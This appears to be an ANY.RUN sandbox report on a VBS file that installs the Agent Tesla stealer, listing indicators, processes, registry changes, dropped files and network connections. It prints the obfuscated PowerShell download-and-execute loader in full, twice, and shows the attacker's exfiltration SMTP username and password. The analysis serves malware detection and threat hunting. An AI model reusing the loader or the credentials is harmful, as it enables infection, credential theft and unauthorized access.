File name: 6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs

Full analysis: https://app.any.run/tasks/7dada979-0903-4dc6-b784-2f51e4a1c855
Verdict: Malicious activity
Threats: Agent Tesla

Agent Tesla is spyware that collects information about its victims' actions by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold.

Analysis date: March 19, 2024, 09:00:57
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: stealer, agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (335), with CRLF line terminators
MD5: 807AB2044EB4C9BE0AAE827CEF21DBE9
SHA1: AFE94F9DFDC9D6CDAD94EBB8C6FEC4DD17FF2EC2
SHA256: 6B3541FD675B6B9B1AB2450E632E54E8B950975A807E74F0E1E0D87563C9ACA7
SSDEEP: 192:nLB+BSKoP0h+G4cszTHlyNWioYJ+dXhnlbp/Iu5YQioN1ytucyoS6AK2mFAt:kSwh+oszTHvYAZBSQJ4rS6BM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Actions look like stealing of personal data

      • wab.exe (PID: 3352)
    • Steals credentials from Web Browsers

      • wab.exe (PID: 3352)
    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 3352)
    • Connects to the CnC server

      • wab.exe (PID: 3352)
    • AGENTTESLA has been detected (SURICATA)

      • wab.exe (PID: 3352)
    • Scans artifacts that could help determine the target

      • wab.exe (PID: 3352)
  • SUSPICIOUS

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 2496)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2496)
    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 2496)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 4076)
      • wscript.exe (PID: 2496)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 3352)
    • Checks Windows Trust Settings

      • wab.exe (PID: 3352)
    • Connects to SMTP port

      • wab.exe (PID: 3352)
  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)
    • Checks supported languages

      • wab.exe (PID: 3352)
    • Reads the computer name

      • wab.exe (PID: 3352)
    • Checks proxy server information

      • wab.exe (PID: 3352)
      • slui.exe (PID: 2584)
    • Reads the machine GUID from the registry

      • wab.exe (PID: 3352)
    • Creates files or folders in the user directory

      • wab.exe (PID: 3352)
    • Reads Environment values

      • wab.exe (PID: 3352)
    • Reads Microsoft Office registry keys

      • wab.exe (PID: 3352)
    • Reads the software policy settings

      • slui.exe (PID: 2584)
      • wab.exe (PID: 3352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process: (3352) wab.exe
Protocol: smtp
Host: smtp.crane-eletronics.com
Port: 587
Username: pen@crane-eletronics.com
Password: peFyHns8

This SMTP account is the exfiltration channel behind the "Connects to SMTP port" indicator above; treat the host, the account and the password as indicators to block and hunt on, not as credentials to use.
All screenshots are available in the full report
Total processes: 135
Monitored processes: 6
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process chain as shown in the report ("no specs" marks a process with no indicators of its own; the report names only powershell.exe, without a PID, as the parent of conhost.exe and wab.exe):
explorer.exe → wscript.exe (2496, no specs) → powershell.exe (4076, System32, no specs) → powershell.exe (4968, SysWOW64, no specs) → wab.exe (3352) #AGENTTESLA
powershell.exe → conhost.exe (6308, no specs)
svchost.exe → slui.exe (2584)

Process information

PID
CMD
Path
Indicators
Parent process
2496 "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2584 C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
3352 "C:\Program Files (x86)\windows mail\wab.exe"
Path: C:\Program Files (x86)\Windows Mail\wab.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
4076"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stopover='konsekvente:\Narcomedusan';Set-Content $Stopover 'Recensure';$Eksemplificerings=Test-Path $Stopover;if($Eksemplificerings){exit};function Skamfnrr ($Palmegrens){For($maws=4; $maws -lt $Palmegrens.Length-1; $maws+=5){$Ths=$Ths+$Palmegrens.'Substring'($maws, 1)};$Ths;}$Konsultationstiders=Skamfnrr 'NonehTr.mt HantR.dup,uxusPer,:Jdek/Fabr/ ined eer,lexiBiclvLocueAf,r.Bakigun eoUnexo Samg GyrlmegaeUnso.Ud oc Whio VrdmAnco/The,uA,juc Dy,? ad.e Si,xtus pRoyaoBrisrMosctUn.p=ArordUnbeoMelew Plun RvelOptaoSticaPoledMori&Su eiSupid ab=Ble,1RetvEJo,i0ba,lz.hervMotoCMitoE,ileOMi,sdUrduYThymBGunnuKrsldEr.ru SelA.pitLSpilQC,loPForkUNitrcChriADemoT dpojAfpaQ FerZSchiNArchrDealBImprERefuPMediJ AutL QuaiSkab ';$transl=Skamfnrr ' DobiAmpheA atxStop ';$Multivariate = Skamfnrr 'Skil\VindsHmoryJvnhsdesiw Sy oNortwTaas6Du,e4Unc,\SpygWO,kli planW.aldEquaoP lewSpirsS.viPcasooHymnw S,ueAuslr So,SRverhLsble Blal pplTvan\ Fisv Exo1harm.,olo0Over\bounp AlloAbsiw SnueT asrTalisU.prhMoneeDisblStralFing. U.deBrstxA.steTran ';&($transl) (Skamfnrr ' ,ni$C.eiRTh re ortSi ooWooluAlarrEste=Ant.$Tro e omnnHrenvU.ex:Fo tw Pari Skyn eed,riniByger N,u ') ;&($transl) (Skamfnrr 'Disc$D scMDiosuSce lUnsotDepoiFlemv,ripaS adrSeseiC mpaGenntLge.eDiff=Sjkl$RessRNonreReintHymeo vuuPeoprOver+udda$AflsM satuBl tlKollt viimu tvBabyaP,elrK,ebiOlisa Ud t ,aleLing ') ;&($transl) (Skamfnrr ' Sid$V,ktSPj,tt krb BezeMistr,adea TronMakad Ade1Tyde4Sema8Spnd .egn=Tyve Ov.r( upe(Unsig conwNoncmUltriFilo DroswUnp.ialkan bru3Blac2 Aka_ForgpBe krBinnoMam,cDikteChlosRegisA,to s,i-.eseF Ung OverP,onirColloAugmcStaieSinns insudhuI VovdUnqu=Sell$ San{TrveP E sI SynDHair}Cave)publ.LisaC edioopermslynm LiaaLuftnUddadSemiLHandiD,senRelaeIn.o)Epi. Flo-Inkos Fldp,hrilStaniCom,t,ona ,mal[,fstcPro.h M.ta.nsur Kom]Hold3Suba4Afg. 
');&($transl) (Skamfnrr 'Haru$ItalU DomhSpe,oUnasm HypoFi.tgho.tePo.tn dolienertFunneDisstSpareMycorUnspn Bo.eres sTi.e Afre=Co o T.ve$Wi hSvampt Cr.bGl weOverrParaaSlatnO erdMatr1Han 4 Blo8Uhyg[Ufor$ utS rect,ndvbSinie,acerN dsaAlamn DobdM,tr1 Idi4anke8fals.Ce.ecA teoLoriu,posnEmsitHarm- Blr2Sock]Ansv ');&($transl) (Skamfnrr ' Co $T.sts Chal TaioSamuwSkrimUnmaoDe.ltvan.iElfeoevitnProd=Kond(KaraTLi,heBelasopspt.nde-CognPHalvaVaritForfh,hri Zygo$CalmM ConuSkumlStrmtS amiBrokv SphaAnstrkr.li An.a.nfitStateVulg).all M no-AktiAUhf,nLabydStei Tet(Nyan[M.laIBockn mentGalvPLym,t FyrrAlba],etr:Band: RigsKasti M azU,obeAmus Ho u- gr.e AtoqVo.e Rent8He b) ,it ') ;if ($slowmotion) {&$Multivariate $Uhomogeniteternes;} else {;$Elkrafts=Skamfnrr 'UnhaSBetotSinua NonrlabotOffi- ParBAssoi .uit.idesKrneTA,tirScuraVenenBrefssmalfRakleTurbrKniv Sko-flyvSInteou,diuoverr Ti cTi.fe Pia oro$PizzKFtreoMo,onCispsM kiu NonlTvint ConaHi ttSt,viBerbo,rskn Fd sUdgit TiliGenndSisaemoserSk ms re bnke-a,ekDKllie SuasO.ertFrigiHanknseveaUnq.tFlapiResuoViatnUre Vene$Z,loRFraaeDenatStroo Friu slarS,aa ';&($transl) (Skamfnrr 'I ds$ErfaRSp,ceElectBoxho SteuMrkarNeur=Quad$SaxeeDitenJgervtelu:BemaaMorpp SampFragdCramaSolatBetea,iss ') ;&($transl) (Skamfnrr 'SkriITe rmMoanp KokoditmrForsta,te-SavlMRejsoNon dKi ouTrillTeleeEksi gudBBarsi RevtAfhssAft TAn kr olaHomonBifls UnafKne e fu rPreo ') ;$Retour=$Retour+'\Eucarpic.joy';while (-not $ingebeth) {&($transl) (Skamfnrr 'Rhyt$Frati.regnWracgForteR.bbb MeseArbet Redhsmal=Fle ( AfvTOvereUnplsBusst sy - ndlP Gr aAdmit TuthS ir .rs$ NonRUds eHarbtBrono,dliu M drAzoc)Carr ') ;&($transl) $Elkrafts;&($transl) (Skamfnrr 'PapnSPe.stGrataCondr Libt,uft-SchoSsognlTraceSp,reSnu.p Spe .dbl5P.co ');}&($transl) (Skamfnrr 'Pret$TudsFGeleo.uttlVarmkBrimeTontmTu.eiTheln ArydEmiteAmalfforloB,sirReolsCom,k StoeRecorklim mbr=Usik StriGG ngePia.tSkra-AnemC papo In nC,rtt S reAn.ans,ontD.fe Pill$MuscRFangeUnfutMeanoPestu errrFa.a ');&($transl) (Skamfnrr '.ati$TheoK AktoAndrmLo 
abd ngi StanBlndaCo.ntSolbiSmi.oNeg.nBe ae I,dnBesp6,ind2Kaar oul=Appr Sona[OmstS TemyVe.ssI.latThioeAr,emBir..Ads CBesvoS,mlnHandvAnaleGuarrH.lit .on]Ef e: .eb:GlimF Unrr nonoPresmClubB.evgaKl.rs Tyle nar6Tran4RntgS Vert SysrKrlii M.jnPapng Gra( wel$D bbF.assoOloml HuskNonde JuimBlu.iSapinAvo.dTotiekafff n roFo rr DiasDannk,roce lcrUnv,)Guri ');&($transl) (Skamfnrr 'B.od$.uldCGlitoR,selRes lMayhuregnt,ottocaserIllui ShieWhinsUnde Leva=Nonp Odre[g.olS oncy Vo.sBen tGenke PremP,eu. pilTTeleeD.lkxnonvtBa,l.dr aEGe.enSexocLarrom.didDingibre,nNoneg Tox]Fysi:.yss:handAAd.eSBirtC V,nI GenIA.ag.HowlGTo.ee KoktInv.SFrogt.nderEngaiSyc.nBeshgU,tr(B rh$Co,kKRet,opowdmMis,bOu siKo.sn K naJow tTinsiK,glo aoinForbeTripnDikt6 Tra2 fro)Gel, ');&($transl) (Skamfnrr ' .id$,riaK tolngensaEtikpFootnNonsi legnInkbgAftaeOve,nOp e=Pse.$ DatCSissoHistlA.kalIncau Natt HanoHjlprGaariB sweScats Hng.Ra,esL.ngudotabBlgesBristPapyrTelei PrenSkrig Flg(,klm3Kult2Nomo3Vold2 Bid6 Gay8Foru,Nonr3Rosm7Ani,1P,nw7Ford4wlon)N.ur ');&($transl) $Knapningen;}"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
4968"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stopover='konsekvente:\Narcomedusan';Set-Content $Stopover 'Recensure';$Eksemplificerings=Test-Path $Stopover;if($Eksemplificerings){exit};function Skamfnrr ($Palmegrens){For($maws=4; $maws -lt $Palmegrens.Length-1; $maws+=5){$Ths=$Ths+$Palmegrens.'Substring'($maws, 1)};$Ths;}$Konsultationstiders=Skamfnrr 'NonehTr.mt HantR.dup,uxusPer,:Jdek/Fabr/ ined eer,lexiBiclvLocueAf,r.Bakigun eoUnexo Samg GyrlmegaeUnso.Ud oc Whio VrdmAnco/The,uA,juc Dy,? ad.e Si,xtus pRoyaoBrisrMosctUn.p=ArordUnbeoMelew Plun RvelOptaoSticaPoledMori&Su eiSupid ab=Ble,1RetvEJo,i0ba,lz.hervMotoCMitoE,ileOMi,sdUrduYThymBGunnuKrsldEr.ru SelA.pitLSpilQC,loPForkUNitrcChriADemoT dpojAfpaQ FerZSchiNArchrDealBImprERefuPMediJ AutL QuaiSkab ';$transl=Skamfnrr ' DobiAmpheA atxStop ';$Multivariate = Skamfnrr 'Skil\VindsHmoryJvnhsdesiw Sy oNortwTaas6Du,e4Unc,\SpygWO,kli planW.aldEquaoP lewSpirsS.viPcasooHymnw S,ueAuslr So,SRverhLsble Blal pplTvan\ Fisv Exo1harm.,olo0Over\bounp AlloAbsiw SnueT asrTalisU.prhMoneeDisblStralFing. U.deBrstxA.steTran ';&($transl) (Skamfnrr ' ,ni$C.eiRTh re ortSi ooWooluAlarrEste=Ant.$Tro e omnnHrenvU.ex:Fo tw Pari Skyn eed,riniByger N,u ') ;&($transl) (Skamfnrr 'Disc$D scMDiosuSce lUnsotDepoiFlemv,ripaS adrSeseiC mpaGenntLge.eDiff=Sjkl$RessRNonreReintHymeo vuuPeoprOver+udda$AflsM satuBl tlKollt viimu tvBabyaP,elrK,ebiOlisa Ud t ,aleLing ') ;&($transl) (Skamfnrr ' Sid$V,ktSPj,tt krb BezeMistr,adea TronMakad Ade1Tyde4Sema8Spnd .egn=Tyve Ov.r( upe(Unsig conwNoncmUltriFilo DroswUnp.ialkan bru3Blac2 Aka_ForgpBe krBinnoMam,cDikteChlosRegisA,to s,i-.eseF Ung OverP,onirColloAugmcStaieSinns insudhuI VovdUnqu=Sell$ San{TrveP E sI SynDHair}Cave)publ.LisaC edioopermslynm LiaaLuftnUddadSemiLHandiD,senRelaeIn.o)Epi. Flo-Inkos Fldp,hrilStaniCom,t,ona ,mal[,fstcPro.h M.ta.nsur Kom]Hold3Suba4Afg. 
');&($transl) (Skamfnrr 'Haru$ItalU DomhSpe,oUnasm HypoFi.tgho.tePo.tn dolienertFunneDisstSpareMycorUnspn Bo.eres sTi.e Afre=Co o T.ve$Wi hSvampt Cr.bGl weOverrParaaSlatnO erdMatr1Han 4 Blo8Uhyg[Ufor$ utS rect,ndvbSinie,acerN dsaAlamn DobdM,tr1 Idi4anke8fals.Ce.ecA teoLoriu,posnEmsitHarm- Blr2Sock]Ansv ');&($transl) (Skamfnrr ' Co $T.sts Chal TaioSamuwSkrimUnmaoDe.ltvan.iElfeoevitnProd=Kond(KaraTLi,heBelasopspt.nde-CognPHalvaVaritForfh,hri Zygo$CalmM ConuSkumlStrmtS amiBrokv SphaAnstrkr.li An.a.nfitStateVulg).all M no-AktiAUhf,nLabydStei Tet(Nyan[M.laIBockn mentGalvPLym,t FyrrAlba],etr:Band: RigsKasti M azU,obeAmus Ho u- gr.e AtoqVo.e Rent8He b) ,it ') ;if ($slowmotion) {&$Multivariate $Uhomogeniteternes;} else {;$Elkrafts=Skamfnrr 'UnhaSBetotSinua NonrlabotOffi- ParBAssoi .uit.idesKrneTA,tirScuraVenenBrefssmalfRakleTurbrKniv Sko-flyvSInteou,diuoverr Ti cTi.fe Pia oro$PizzKFtreoMo,onCispsM kiu NonlTvint ConaHi ttSt,viBerbo,rskn Fd sUdgit TiliGenndSisaemoserSk ms re bnke-a,ekDKllie SuasO.ertFrigiHanknseveaUnq.tFlapiResuoViatnUre Vene$Z,loRFraaeDenatStroo Friu slarS,aa ';&($transl) (Skamfnrr 'I ds$ErfaRSp,ceElectBoxho SteuMrkarNeur=Quad$SaxeeDitenJgervtelu:BemaaMorpp SampFragdCramaSolatBetea,iss ') ;&($transl) (Skamfnrr 'SkriITe rmMoanp KokoditmrForsta,te-SavlMRejsoNon dKi ouTrillTeleeEksi gudBBarsi RevtAfhssAft TAn kr olaHomonBifls UnafKne e fu rPreo ') ;$Retour=$Retour+'\Eucarpic.joy';while (-not $ingebeth) {&($transl) (Skamfnrr 'Rhyt$Frati.regnWracgForteR.bbb MeseArbet Redhsmal=Fle ( AfvTOvereUnplsBusst sy - ndlP Gr aAdmit TuthS ir .rs$ NonRUds eHarbtBrono,dliu M drAzoc)Carr ') ;&($transl) $Elkrafts;&($transl) (Skamfnrr 'PapnSPe.stGrataCondr Libt,uft-SchoSsognlTraceSp,reSnu.p Spe .dbl5P.co ');}&($transl) (Skamfnrr 'Pret$TudsFGeleo.uttlVarmkBrimeTontmTu.eiTheln ArydEmiteAmalfforloB,sirReolsCom,k StoeRecorklim mbr=Usik StriGG ngePia.tSkra-AnemC papo In nC,rtt S reAn.ans,ontD.fe Pill$MuscRFangeUnfutMeanoPestu errrFa.a ');&($transl) (Skamfnrr '.ati$TheoK AktoAndrmLo 
abd ngi StanBlndaCo.ntSolbiSmi.oNeg.nBe ae I,dnBesp6,ind2Kaar oul=Appr Sona[OmstS TemyVe.ssI.latThioeAr,emBir..Ads CBesvoS,mlnHandvAnaleGuarrH.lit .on]Ef e: .eb:GlimF Unrr nonoPresmClubB.evgaKl.rs Tyle nar6Tran4RntgS Vert SysrKrlii M.jnPapng Gra( wel$D bbF.assoOloml HuskNonde JuimBlu.iSapinAvo.dTotiekafff n roFo rr DiasDannk,roce lcrUnv,)Guri ');&($transl) (Skamfnrr 'B.od$.uldCGlitoR,selRes lMayhuregnt,ottocaserIllui ShieWhinsUnde Leva=Nonp Odre[g.olS oncy Vo.sBen tGenke PremP,eu. pilTTeleeD.lkxnonvtBa,l.dr aEGe.enSexocLarrom.didDingibre,nNoneg Tox]Fysi:.yss:handAAd.eSBirtC V,nI GenIA.ag.HowlGTo.ee KoktInv.SFrogt.nderEngaiSyc.nBeshgU,tr(B rh$Co,kKRet,opowdmMis,bOu siKo.sn K naJow tTinsiK,glo aoinForbeTripnDikt6 Tra2 fro)Gel, ');&($transl) (Skamfnrr ' .id$,riaK tolngensaEtikpFootnNonsi legnInkbgAftaeOve,nOp e=Pse.$ DatCSissoHistlA.kalIncau Natt HanoHjlprGaariB sweScats Hng.Ra,esL.ngudotabBlgesBristPapyrTelei PrenSkrig Flg(,klm3Kult2Nomo3Vold2 Bid6 Gay8Foru,Nonr3Rosm7Ani,1P,nw7Ford4wlon)N.ur ');&($transl) $Knapningen;}"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6308 \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 14 495
Read events: 14 471
Write events: 24
Delete events: 0

Modification events

The ten events shown all write to HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:

(2496) wscript.exe | write | ProxyBypass = 1
(2496) wscript.exe | write | IntranetName = 1
(2496) wscript.exe | write | UNCAsIntranet = 1
(2496) wscript.exe | write | AutoDetect = 0
(4968) powershell.exe | write | ProxyBypass = 1
(4968) powershell.exe | write | IntranetName = 1
(4968) powershell.exe | write | UNCAsIntranet = 1
(4968) powershell.exe | write | AutoDetect = 0
(3352) wab.exe | write | ProxyBypass = 1
(3352) wab.exe | write | IntranetName = 1
Executable files: 0
Suspicious files: 4
Text files: 5
Unknown types: 6

Dropped files

PID Process | Filename | Type

4076 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rhfexjqm.4kt.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4968 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lvz002jq.cws.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4968 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ybgm05j.yqa.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4076 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dz2akq1x.3ov.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3352 wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | binary
  MD5: 7ACEAAA0C8A5E52B497DACA8A50D37EB
  SHA256: 4FBE4734966E951935898F0B7D0F61CB088529A42E01FD4580945263DF646156
3352 wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | binary
  MD5: 53CF11AC4A9DF33D2BF786392D3E6A17
  SHA256: 0E1E20A72BFB5F7AB41FA491E2E0687B288388E65EAA11485539BDD6AE167AB5
3352 wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | binary
  MD5: AC89A852C2AAA3D389B2D2DD312AD367
  SHA256: 0B720E19270C672F9B6E0EC40B468AC49376807DE08A814573FE038779534F45
3352 wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D | binary
  MD5: A6384E23EBEA2B95082022A9EAA0F346
  SHA256: 2865568586BAFF0C8C404940257D5FC586E495A267C169F875E3D22325B15A9C
3352 wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | binary
  MD5: DBA737766CAA750561A7D1EF422724CB
  SHA256: 5709B340759D61E0BE8D4258B9BA874F6DE6E02E9519E6BB5FF32CEF2F4B5D16
3352 wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277D | binary
  MD5: DC3BCD2BC8D3E814D4768E6FD184899B
  SHA256: CCDBB4D96F100596B3FCBACF8866C86180033D2C94FC0BCB76298E01CB0797A1

None of these is a payload drop. The __PSScriptPolicyTest_*.ps1/.psm1 files are written by powershell.exe itself when it starts, to probe whether an application control policy applies to scripts, which is why both PowerShell instances produce them with identical hashes. The CryptnetUrlCache entries are the Windows certificate revocation cache filled by the OCSP lookups wab.exe makes to ocsp.pki.goog in the HTTP requests below.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 34
DNS requests: 15
Threats: 3

HTTP requests

PID Process | Method HTTP code | IP | URL | CN | Type | Size | Reputation (rows without a Type field had none in the report)

3732 SIHClient.exe | GET 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | CN: unknown | Type: binary | 409 b | Reputation: unknown
1260 backgroundTaskHost.exe | GET 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | CN: unknown | 313 b | Reputation: unknown
3996 svchost.exe | GET 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | CN: unknown | Type: binary | 471 b | Reputation: unknown
4800 backgroundTaskHost.exe | GET 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | CN: unknown | Type: binary | 471 b | Reputation: unknown
3352 wab.exe | GET 200 | 172.217.16.131:80 | http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D | CN: unknown | Type: binary | 724 b | Reputation: unknown
3352 wab.exe | GET 200 | 172.217.16.131:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | CN: unknown | Type: binary | 1.41 Kb | Reputation: unknown
3352 wab.exe | GET 200 | 172.217.16.131:80 | http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCRd4hKrA6aBAnnS3UYBsso | CN: unknown | Type: binary | 472 b | Reputation: unknown
3352 wab.exe | GET 200 | 172.217.16.131:80 | http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCECzpBwEAqmZNCdn%2B9lFcFjc%3D | CN: unknown | 471 b | Reputation: unknown

Connections

PID Process | IP | Domain | ASN | CN | Reputation

(not attributed to a process) | 239.255.255.250:1900 | unknown
6140 svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3996 svchost.exe | 20.190.159.73:443 | (no domain) | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1280 MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3996 svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
700 svchost.exe | 142.250.186.78:443 | drive.google.com | GOOGLE | US | whitelisted
